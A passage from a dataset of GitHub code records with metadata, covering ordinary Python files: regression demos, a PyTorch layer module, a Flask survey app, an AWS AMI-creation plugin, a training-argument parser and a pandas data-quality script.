238.5\n # 方式1:根据直线方程计算的价格\n print(\"price=\", a * area + b)\n # 方式2:根据predict方法预测的价格\n print(\"price predicted=\", regr.predict([[area]]))\n # 画图\n # 1.真实的点\n plt.scatter(x, y, color='blue', label='real price')\n # 2.拟合的直线\n plt.plot(x, regr.predict(x), color='red', linewidth=4, label='predicted price')\n plt.xlabel('area')\n plt.ylabel('price')\n plt.legend(loc='lower right')\n plt.show()\n", "repo_name": "KeXiangWang/course-of-big-data-and-AI-training", "sub_path": "1st/__main__.py", "file_name": "__main__.py", "file_ext": "py", "file_size_in_byte": 1164, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 9, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.linear_model", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "12040901034", "text": "# -*- coding: utf-8 -*-\nimport torch.nn as nn\n#import torch.nn.functional as F\nfrom torchsummary import summary\n\n\"\"\"\nConv-Bn-Relu moduule\n\"\"\"\nclass ConvBnRelu(nn.Module):\n def __init__(self,in_channels,out_channels,kernel_size,stride=1,\n padding=0,dilation=1,groups=1,relu6=False):\n super(ConvBnRelu,self).__init__()\n self.conv=nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias=False)\n self.bn=nn.BatchNorm2d(out_channels)\n self.relu=nn.ReLU6(inplace=True) if relu6 else nn.ReLU(inplace=True) \n \n def forward(self,x):\n x=self.conv(x)\n x=self.bn(x)\n x=self.relu(x)\n return x\nif __name__ == \"__main__\":\n convBR=ConvBnRelu(in_channels=3,out_channels=32,kernel_size=3,padding=1)\n print(convBR)\n summary(convBR, (3, 224, 224))\n", "repo_name": "cswhshi/Classical-Network", "sub_path": "LightWeight_Model/Module/ConvBnRelu.py", "file_name": "ConvBnRelu.py", "file_ext": "py", "file_size_in_byte": 856, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.nn.Module", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.ReLU6", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 15, "usage_type": "call"}, {"api_name": "torchsummary.summary", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "4396805964", "text": "\"\"\"Takes CSV, does a regression\nCHANGE FILE PATH ON LINE 15 to where your instances file is located\"\"\"\n\n\n\nfrom sklearn import linear_model\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as dates\nimport datetime as dt\nfrom sklearn import metrics\nfrom sklearn import svm\n\nlistx = []\nlisty = []\ngraphx = []\nwith open(\"instances_without_noise.txt\") as f:\n\tfor line in f:\n\t\tline = line.rstrip().split(\",\")\n\t\tlistx.append(line[2:])\n\t\tt = dt.datetime.strptime(line[1], \"%Y-%m-%d %H:%M:%S\")\n\t\tgraphx.append(dates.date2num(t))\nprint(\"instances loaded\")\nwith open(\"../data/price_series.txt\") as f:\n\tfor line in f:\n\t\tline = line.rstrip().split(\",\")\n\t\tlisty.append(float(line[-1]))\nX = np.array(listx, dtype='float64')\ny = np.array(listy, dtype='float64')\nprint(X.size)\nprint(y.size)\nprint(X)\nprint(y)\nreg = linear_model.Lasso(alpha = 0.1)\n#reg = svm.SVR(kernel='linear', epsilon=0.05)\nreg.fit(X, y)\nprint(\"model built\")\nprint(reg.score(X, y))\ntest_y = reg.predict(X)\nprint(\"R2\")\nprint(metrics.r2_score(y, test_y))\n# Plot outputs\n# Plot outputs\nplt.scatter(graphx, y, color='black')\nplt.plot(graphx, test_y, color='blue', linewidth=3)\n\nplt.xlabel('7-Apr-2018 to 13-Apr-2018 (delta = 1hr)')\nplt.ylabel('Bitcoin Value USD')\nplt.title('Regression Model')\nplt.gcf().autofmt_xdate()\nmyFmt = dates.DateFormatter('%m/%d')\nplt.gca().xaxis.set_major_formatter(myFmt)\n\nplt.show()\n\n\n#0.1858734448927718\n#0.14955317499263565\n\n", "repo_name": "marastaines/twittercrypto", "sub_path": "src/regression.py", "file_name": "regression.py", "file_ext": "py", "file_size_in_byte": 1431, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "attribute"}, {"api_name": "matplotlib.dates.date2num", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.dates", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.linear_model", "line_number": 34, "usage_type": "name"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.dates.DateFormatter", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.dates", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "10740049231", "text": "import re\nimport json\nimport pathlib\n\nimport markovify\n\n\ndef main():\n source_dir = pathlib.Path(\"./source_exported_chats\")\n\n model_sentences = []\n\n for file_path in source_dir.glob(\"*.json\"):\n print(f\"loading {file_path}...\")\n with open(file_path, \"rb\") as f:\n source_data = json.load(f)\n\n for message in source_data[\"messages\"]:\n if not message[\"text\"]:\n continue\n\n if isinstance(message[\"text\"], list):\n # print(message[\"text\"])\n for item in message[\"text\"]:\n if isinstance(item, str):\n text = item\n else:\n text = message[\"text\"]\n\n text = text.replace(\"'\", \"\").replace('\"', \"\")\n\n # sentences = re.split(', |_|-|!|\\+', text)\n chat_sentences = re.split(r\"(?')\ndef gen_ques(count):\n\tprint(session)\n\t##global ques_num\n\t# if count != len(session['responses']):\n\t# \tflash(\"You are attempting to access an invalid question\")\n\t# \treturn redirect(url_for('gen_ques', count = len(session['responses'])))\n\tquestion = satisfaction_survey.questions[count].question\n\tchoices = satisfaction_survey.questions[count].choices\n\treturn render_template('questions.html', question = question, choices = choices)\n\t\n\n@app.route('/answers', methods=[\"POST\"])\ndef answers():\n\tresponse = request.form['choice']\n\tans = session['responses']\n\tans.append(response)\n\tsession['responses'] = ans\n\tprint(session['responses'])\n\tprint(response)\n\tglobal ques_num\n\tif session[QUES_NUM] == len(satisfaction_survey.questions) - 1:\n\t\treturn redirect('/thank_you')\n\telse:\n\t\tques_num = session[QUES_NUM] + 1\n\t\tsession[QUES_NUM] = ques_num\n\t\treturn redirect(url_for('gen_ques', count = session[QUES_NUM]))\n\n@app.route('/thank_you')\ndef thanks():\n\tsurvey_title = satisfaction_survey.title\n\treturn render_template('thank_you.html', title = survey_title)", "repo_name": "jat22/flask-survey", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1874, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask_debugtoolbar.DebugToolbarExtension", "line_number": 9, "usage_type": "call"}, {"api_name": "surveys.satisfaction_survey.title", "line_number": 16, "usage_type": "attribute"}, {"api_name": "surveys.satisfaction_survey", "line_number": 16, "usage_type": "name"}, {"api_name": "surveys.satisfaction_survey.instructions", "line_number": 17, "usage_type": "attribute"}, {"api_name": "surveys.satisfaction_survey", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 28, "usage_type": "argument"}, {"api_name": "surveys.satisfaction_survey.questions", "line_number": 33, "usage_type": "attribute"}, {"api_name": "surveys.satisfaction_survey", "line_number": 33, "usage_type": "name"}, {"api_name": "surveys.satisfaction_survey.questions", "line_number": 34, "usage_type": "attribute"}, {"api_name": "surveys.satisfaction_survey", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 47, "usage_type": "name"}, {"api_name": "surveys.satisfaction_survey.questions", "line_number": 47, "usage_type": "attribute"}, {"api_name": "surveys.satisfaction_survey", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 52, "usage_type": "name"}, {"api_name": "surveys.satisfaction_survey.title", "line_number": 56, "usage_type": "attribute"}, {"api_name": "surveys.satisfaction_survey", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "30328906210", "text": "from common.methods import set_progress\nfrom infrastructure.models import Server\n\ndef run(job, logger=None):\n # Get server & power status\n server = job.server_set.first()\n server_original_power_status = server.power_status\n \n # Power off VM (optional)\n #if server_original_power_status != \"POWEROFF\":\n # set_progress(\"Powering off server.\")\n # task = server.power_off()\n # -->add timeout here to wait for shutdown\n\n # Connect to AWS\n e = server.environment\n set_progress(\"Connecting to EC2 region {}.\".format(e.aws_region), logger, job)\n rh = server.resource_handler\n aws = rh.cast()\n aws.connect_ec2(e.aws_region)\n ec2 = aws.resource_technology.work_class.ec2\n\n # Get instance-id & region\n instance_id = server.resource_handler_svr_id\n\n # Create AMI from instance\n #http://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/Creating_EBSbacked_WinAMI.html\n ec2.create_image(instance_id, name='{{ AMIname }}', description='Created via CloudBolt')\n return \"\",\"\",\"\"\n", "repo_name": "CloudBoltSoftware/cloudbolt-forge", "sub_path": "actions/cloudbolt_plugins/aws/create_image/create_image_from_instance.py", "file_name": "create_image_from_instance.py", "file_ext": "py", "file_size_in_byte": 1031, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 38, "dataset": "github-code", "pt": "41", "api": [{"api_name": "common.methods.set_progress", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "74783864122", "text": "import yaml\nimport argparse\n\ndef load_arguments_from_yaml(filename):\n with open(filename, 'r') as file:\n config = yaml.safe_load(file)\n return config\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Data-Centric Learning from Unlabeled Graphs with Diffusion Model')\n parser.add_argument('--gpu-id', type=int, default=0,\n help='which gpu to use if any (default: 0)')\n parser.add_argument('--num-workers', type=int, default=0,\n help='number of workers for data loader')\n parser.add_argument('--no-print', action='store_true', default=False,\n help=\"don't use progress bar\")\n\n parser.add_argument('--dataset', default=\"ogbg-molsider\", type=str,\n choices=['plym-density', 'plym-oxygen', 'plym-melting', 'plym-glass', 'plym-thermal',\n 'ogbg-mollipo', 'ogbg-molfreesolv', 'ogbg-molesol', \n 'ogbg-molhiv', 'ogbg-molbace', 'ogbg-molbbbp', 'ogbg-molclintox','ogbg-molsider','ogbg-moltox21','ogbg-moltoxcast'],\n help='dataset name (plym-, ogbg-)')\n \n # model\n parser.add_argument('--model', type=str, default='gin-virtual',\n help='GNN gin, gin-virtual, or gcn, or gcn-virtual (default: gin-virtual)')\n parser.add_argument('--readout', type=str, default='sum',\n help='graph readout (default: sum)')\n parser.add_argument('--norm-layer', type=str, default='batch_norm', \n help='GNN gin, gin-virtual, or gcn, or gcn-virtual (default: gin-virtual)')\n parser.add_argument('--drop-ratio', type=float, default=0.5,\n help='dropout ratio (default: 0.5)')\n parser.add_argument('--num-layer', type=int, default=5,\n help='number of GNN message passing layers (default: 5)')\n parser.add_argument('--emb-dim', type=int, default=300,\n help='dimensionality of hidden units in GNNs (default: 300)')\n # training\n parser.add_argument('--batch-size', type=int, default=512,\n help='input batch size for training (default: 256)')\n parser.add_argument('--patience', type=int, default=50,\n help='patience for early stop')\n parser.add_argument('--trails', type=int, default=5,\n help='nubmer of experiments (default: 5)') \n parser.add_argument('--lr', '--learning-rate', type=float, default=1e-2,\n help='Learning rate (default: 1e-2)')\n parser.add_argument('--wdecay', default=1e-5, type=float,\n help='weight decay')\n parser.add_argument('--epochs', type=int, default=300,\n help='number of epochs to train')\n parser.add_argument('--initw-name', type=str, default='default',\n help=\"method to initialize the model paramter\")\n # augmentation\n parser.add_argument('--start', type=int, default=20,\n help=\"start epoch for augmentation\")\n parser.add_argument('--iteration', type=int, default=20,\n help='epoch to do augmentation')\n parser.add_argument('--strategy', default=\"replace_accumulate\", type=str,\n choices=['replace_once', 'add_once', 'replace_accumulate', 'add_accumulate'],\n help=' strategy about how to use the augmented examples. \\\n Replace or add to the original examples; Accumulate the augmented examples or not')\n parser.add_argument('--n-jobs', type=int, default=22,\n help='# process to convert the dense adj input to pyg input form')\n parser.add_argument('--n-negative', type=int, default=5,\n help='# negative samples to optimize the augmented example')\n parser.add_argument('--out-steps', type=int, default=5,\n help='outer sampling steps for guided reverse diffusion')\n parser.add_argument('--topk', type=int, default=100,\n help='top k in an augmentation batch ')\n parser.add_argument('--aug-batch', type=int, default=2000,\n help='the augmentation batch compared to training batch')\n parser.add_argument('--snr', type=float, default=0.2,\n help='snr')\n parser.add_argument('--scale-eps', type=float, default=0,\n help='scale eps')\n parser.add_argument('--perturb-ratio', type=float, default=None,\n help='level of noise for perturbation')\n args = parser.parse_args()\n print('no print',args.no_print)\n\n ## n_steps for solver\n args.n_steps = 1\n return args", "repo_name": "liugangcode/data_centric_transfer", "sub_path": "configures/arguments.py", "file_name": "arguments.py", "file_ext": "py", "file_size_in_byte": 4754, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "yaml.safe_load", "line_number": 6, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "33325160192", "text": "#https://github.com/Miserlou/lambda-packages\n#https://chrisalbon.com/python/data_wrangling/pandas_regex_to_create_columns/\nimport json\nimport pandas as pd\nfrom pandas.api.types import is_numeric_dtype\nimport numpy as np\nimport os\nfrom scipy import stats\nimport pprint\n\n#import regex as re\nfrom datetime import datetime\n\nfrom ProblemFinder import ProblemFinder\nfrom ProblemFixer import ProblemFixer\n\npd.set_option('display.max_columns', 20)\n#from typing import List\n\ncol_need=[\"Order Item Id\" ,\"Order Type\" ,\"Lazada Id\" ,\"Seller SKU\",\"Lazada SKU\",\"Created at\",\"Updated at\"]\ncol_optional=[]\n\ndata_path = 'Data//retail_DS.csv'\ndata_path = 'Data//orderDataFlat.csv'\n#missing_values = [\"n/a\", \"na\", \"--\"]\n#na_values = missing_values\ndf = (pd.read_csv(data_path))\n\n#print(df.head())\n\n\n\n#accented_string = \"CARROT ËêùÂçú\"git commit \"\"\n# accented_string is of type 'unicode'\n#import unidecode\n#print(unidecode.unidecode(accented_string))\n\n \n#* try to convert column value to int and calculate errors\ndef calculate_conversion_errors(df_column):\n cnt=0\n errors=[]\n for row in df_column:\n try:\n int(row)\n except ValueError:\n print(row)\n errors.append(cnt)\n pass\n cnt+=1\n return errors\n\n#* Try to remove letters and keep numbers \ndef remove_letters_from_column(df_column):\n return pd.to_numeric(df_column.astype(str).str.replace(r'\\D', '') , errors='ignore')\n\n#* Calculate negative values for numeric columns\ndef calculate_negative_values(df_column):\n return df_column.lt(0).sum()\n\ndef calculate_numerical_outliers_Z(df, col_name, z_thresh=1):\n # Constrains will contain `True` or `False` depending on if it is a value below the threshold.\n constrains = df[[col_name]].select_dtypes(include=[np.number]) \\\n .apply(lambda x: np.abs(stats.zscore(x)) < z_thresh, result_type='broadcast').all(axis=1)\n # Drop (inplace) values set to be rejected\n #df.drop(df.index[~constrains], inplace=True)\n return constrains[constrains==False].shape[0]\n #return df[[col_name]].shape[0] - df[[col_name]].index[constrains].shape[0]\n\ndef calculate_number_outliers_IRQ(df, col_name,low=0.25, high=0.75):\n Q1 = df[col_name].quantile(0.25)\n Q3 = df[col_name].quantile(0.75)\n IQR = Q3 - Q1\n outliers = ((df[col_name] < (Q1 - 1.5 * IQR)) |(df[col_name] > (Q3 + 1.5 * IQR))) \n return df[outliers].shape[0]\n\ndef Analysys(path, filename):\n print(path)\n df = pd.read_csv(path)\n A=ProblemFinder(df)\n \n id_columns=A.columns_ids()\n constant_columns=A.columns_constant_vales()\n currency_columns=A.columns_currency()\n msv_table_all=A.missing_zero_values_table()\n mcv_columns=list(msv_table_all.index)\n\n\n #* Check numeric columns\n numeric_columns=A.get_numeric_columns()\n if numeric_columns:\n #msv_table=msv_table_all.loc[numeric_columns,\"Missing Values\"].fillna(0)\n\n msv_dict={num_column:{\"Missing values\":int(msv_table_all.loc[num_column,\"Missing Values\"]) \n if num_column in mcv_columns else 0} \n for num_column in numeric_columns}\n msv_percent_dict={num_column:{\"Data Audit, %\":int(msv_table_all.loc[num_column,\"Data Audit\"]) \n if num_column in mcv_columns else 0} \n for num_column in numeric_columns }\n #print(msv_percent_dict)\n \n negv_dict={num_column:{\"Negative values\":int(calculate_negative_values(A.df[num_column]))} \n for num_column in numeric_columns}\n \n outliers_dict={num_column:{\"Outliers\":int(calculate_numerical_outliers_Z(A.df,num_column)) \n if (num_column not in constant_columns and num_column not in id_columns) else 0}\n for num_column in numeric_columns }\n \n id_dict={ num_column:{\"ID column\":True if num_column in id_columns else False} \n for num_column in numeric_columns }\n const_dict={ num_column:{\"Constant column\":True if num_column in constant_columns else False} \n for num_column in numeric_columns }\n duplicates_dict={num_column:{\"Number of duplicates\":int(A.number_duplicates_column(num_column))} \n for num_column in numeric_columns}\n currency_dict={ num_column:{\"Currency column\":True if num_column in currency_columns else False} \n for num_column in numeric_columns }\n type_dict={num_column:{\"Type\":\"Numeric\"} for num_column in numeric_columns} \n final_numeric={key: {**value,**negv_dict[key], **msv_percent_dict[key],\n **outliers_dict[key],**id_dict[key], \n **const_dict[key],**duplicates_dict[key],\n **currency_dict[key]\n } for key, value in msv_dict.items()}\n #pprint.pprint(final_numeric)\n\n #* check \"object\" columns\n object_columns=A.type_columns_dict().get(\"object\",None)\n if object_columns:\n #msv_table=msv_table_all.loc[object_columns,\"Missing Values\"].fillna(0)\n msv_dict={num_column:{\"Missing values\":int(msv_table_all.loc[num_column,\"Missing Values\"])\n if num_column in mcv_columns else 0} \n for num_column in object_columns}\n \n msv_percent_dict_string={num_column:{\"Data Audit, %\":int(msv_table_all.loc[num_column,\"Data Audit\"]) \n if num_column in mcv_columns else 0} \n for num_column in object_columns }\n \n id_dict={ num_column:{\"ID column\":True if num_column in id_columns else False} \n for num_column in object_columns }\n const_dict={ num_column:{\"Constant column\":True if num_column in constant_columns else False} \n for num_column in object_columns }\n duplicates_dict={num_column:{\"Number of duplicates\":int(A.number_duplicates_column(num_column))} \n for num_column in object_columns}\n currency_dict={ num_column:{\"Currency column\":True if num_column in currency_columns else False} \n for num_column in object_columns }\n type_dict={num_column:{\"Type\":\"String\"} for num_column in object_columns} \n final_object ={key: {**value, **id_dict[key], \n **const_dict[key],**duplicates_dict[key],\n **currency_dict[key],\n **msv_percent_dict_string[key],\n **type_dict[key]\n\n } for key, value in msv_dict.items()}\n #pprint.pprint(final_object)\n\n #* check datetype columns\n datetime_columns=A.type_columns_dict().get(\"datetime64[ns]\",None)\n\n #print(datetime_columns)\n #print(msv_table_all.index)\n #print(mcv_columns)\n if datetime_columns:\n msv_dict={dt_column:{\"Missing values\":int(msv_table_all.loc[dt_column,\"Missing Values\"]) if dt_column in mcv_columns else 0 } \n for dt_column in datetime_columns}\n id_dict={ dt_column:{\"ID column\":True if dt_column in id_columns else False} \n for dt_column in datetime_columns }\n const_dict={ dt_column:{\"Constant column\":True if dt_column in constant_columns else False} \n for dt_column in datetime_columns } \n #outliers_dict= A.datetime_ouliers(A.df[datetime_columns],2)\n \n msv_percent_dict_dt={dt_column:{\"Data Audit, %\":int(msv_table_all.loc[dt_column,\"Data Audit\"]) \n if dt_column in mcv_columns else 0} \n for dt_column in datetime_columns }\n \n type_dict={dt_column:{\"Type\":\"Datetime\"} for dt_column in datetime_columns} \n final_datetime ={key: {**value, **id_dict[key], \n **const_dict[key],\n # **outliers_dict[key],\n **msv_percent_dict_dt[key], \n **type_dict[key]\n } for key, value in msv_dict.items()}\n\n\n print(A.df.shape[1])\n print(len(final_numeric.keys())+len(final_object.keys())+len(final_datetime.keys()))\n all_col=A.df.columns\n processed_col=list(final_numeric.keys())+list(final_object.keys())+list(final_datetime.keys())\n print(list(set(all_col) - set(processed_col)))\n final_all={**final_numeric,**final_object,**final_datetime}\n \n final=dict()\n final[\"file_name\"]=\"{}_issue_report.json\".format(filename)\n final[\"Row duplicates\"]=A.duplicates_in_dataset()\n final[\"Total rows\"]=A.df.shape[0]\n final[\"Total columns\"]=A.df.shape[1]\n final[\"Columns\"]=final_all\n with open(\"issue_reports\\\\\"+final[\"file_name\"], 'w') as outfile:\n json.dump(final, outfile)\n print(\"DONE\")\n\n\ndf1=pd.DataFrame({'date': [1546315200,\t1545553318,\t1545553318,\"2019/09/08\"],\n 'date_new': [\"2019/09/08\",\tnp.nan,\tnp.nan,\"2019/09/11\"],\n \"string\":[\"BEETROOT������ʆ?\",\"CARROT ËêùÂçú\",\"CARROT ËêùÂçú\",\"CARROT ËêùÂçú\"],\n \"negative\":[0, 3, -9, -90]})\n\n\n\nprint(df1)\n\ndata_path = 'Data//orderDataFlat.csv'\n\nimport glob\npath = \"Data//*.csv\"\n#for fname in glob.glob(path):\n# print(fname)\n# Analysys(fname.replace(\"\\\\\",\"//\"), fname.split(\"\\\\\")[1].split(\".\")[0])\n#print(df.columns)\n#print(df[\"notes\"].head())\n\n\n#print(df['notes'].unique().tolist())\n#print(df.isnull().sum())\n\n#P=ProblemFinder(df)\n#df_short=df[\"notes\"].head(100)\n#print(df_short.isnull().sum())\n#print(P.df.isnull().sum())\n#print(P.missing_zero_values_table())\n\n\n\n\n#A=ProblemFinder(df)\n#print(A.columns_ids())\n\n#P=ProblemFixer(df)\n#print(P.df.head())\n\n#for col in df.columns:\n# if (col.dtypes == object ) or (col.dtypes == \"int64\" and df[col].mean()>1262304000 ):\n# df[col]=pd.to_datetime(df[col], errors='ignore',unit='s')\n#print(df.head())\n\n#print(calculate_number_outliers_IRQ(df, \"negative\"))\n\n#df[\"date_new\"]=df[\"date_new\"].interpolate(method='time', limit=1)\n#print(type(df.dtypes))\n#[print(k) for k,v in df.dtypes.items() if v==\"object\"]\n\n#df = (pd.read_csv(data_path))\n#P=ProblemFixer(df)\n#[P.remove_special_characters(k) for k,v in P.df.dtypes.items() if v==\"object\"]\n#print(P.df.head())\n#print(P.df.dtypes)\n#P.df[\"timeDelivered\"]=pd.to_datetime(P.df[\"timeDelivered\"], errors='ignore',unit='s')\n#print(P.df[\"timeDelivered\"].head())\n\n#P.remove_special_characters(\"string\")\n#print(P.df.head())\n#df[\"string\"]=df[\"string\"].apply(lambda x: strip_accents(x) )\n#print(df.head())\n# accented_string is of type 'unicode'\n\n\n#P=ProblemFixer(df)\n#print(P.df.head())\n\n#log=pd.DataFrame(columns=['time', 'level', 'message'])\n#log=log.append({'time': datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"), 'level': \"INFO\", 'message': \"TEST\"}, ignore_index=True)\n#print(log)\n#df = pd.DataFrame()\n#df = df.append({'name': 'Zed', 'age': 9, 'height': 2}, ignore_index=True)\n#print(df)\n#P.extract_year_month_date(\"date\")\n#print(P.logger)\n#P.logger_save(\"test_log.log\")\n\n#df['date'] = pd.to_datetime(df['date'], errors='ignore', unit='s')\n#df[\"date\"]=pd.to_datetime(df[\"date\"], errors='ignore', dayfirst=False, utc=None,\n# box=True, format=None, coerce=False, unit='ns')\n\n\n\n\n\n\n\n\n\n'''\ndf = pd.DataFrame({'A': ['7','7','9A'],\n# 'B': np.random.rand(3),\n 'C': ['foo','foo','baz'],\n 'D': ['who','who','when'],\n \"Currency\":[\"123\",\"123\",\"€34234\"]\n })\n\n_, idx = np.unique(df, axis = 1, return_index=True)\ndf = df.iloc[:, idx]\nprint(df)\n\n\ncol_list=[]\nfor col in df.columns:\n if df[col].dtype == \"object\":\n if (True in set(df[col].str.contains(r'(\\£|\\$|\\€)' , regex=True).unique())):\n col_list.append(col)\n\ncol_currency=list(filter(lambda x: x != None,[ col \n if True in set(df[col].str.contains(r'(\\£|\\$|\\€)' , regex=True).unique()) \n else None \n for col in df.columns if df[col].dtype == \"object\"] ))\nprint(col_currency)\n\n\n\n#A.df = A.df.apply(lambda x: np.nan if isinstance(x, str) and (x.isspace() or not x) else x)\n#A.df=A.df.replace(r'^\\s*$', np.nan, regex=True)\n#print(A.missing_zero_values_table().head().loc[\"Customer Email\", : ])\n#print(A.df[\"Customer Email\"].unique())\n\n#df.columns=[col.strip() for col in df.columns]\n#print(df[\"Customer Email\"].dtype)\n#df=df.replace('', np.nan).apply(lambda x: x.astype(str).str.upper().str.strip() if x.dtype == \"object\" else x)\n#print(df[\"Customer Email\"].dtype)\n#print(df[\"Customer Email\"].unique())\n\n#df = pd.DataFrame({'A': [7,-8,-9],\n# 'B': np.random.rand(3),\n# 'C': ['foo','bar','baz'],\n# 'D': ['1who','what','when']})\n\n#print(calculate_negative_values(df[\"A\"]))\n#print(df)\n#\n#for col in df.columns:\n# df[col] = pd.to_numeric(df[col].astype(str).str.replace(r'\\D', '') , errors='coerce')\n#print(df)\n#print( 100 * df.isnull().sum() / len(df))\n#print(df.dtypes)\n#print(df.iloc[errors,:])\n\n'''\n\n\n\n\n\n\n\n\n\n\n\n'''\ndf = (pd.read_csv(filepath_or_buffer=os.path.join(data_path, 'master.csv'))\n .rename(columns={'suicides/100k pop' : 'suicides_per_100k',\n ' gdp_for_year ($) ' : 'gdp_year', \n 'gdp_per_capita ($)' : 'gdp_capita',\n 'country-year' : 'country_year'})\n .assign(gdp_year=lambda _df: _df['gdp_year'].str.replace(',','').astype(np.int64))\n )\n'''", "repo_name": "obaydakov-zz/acetl", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 13464, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.set_option", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": 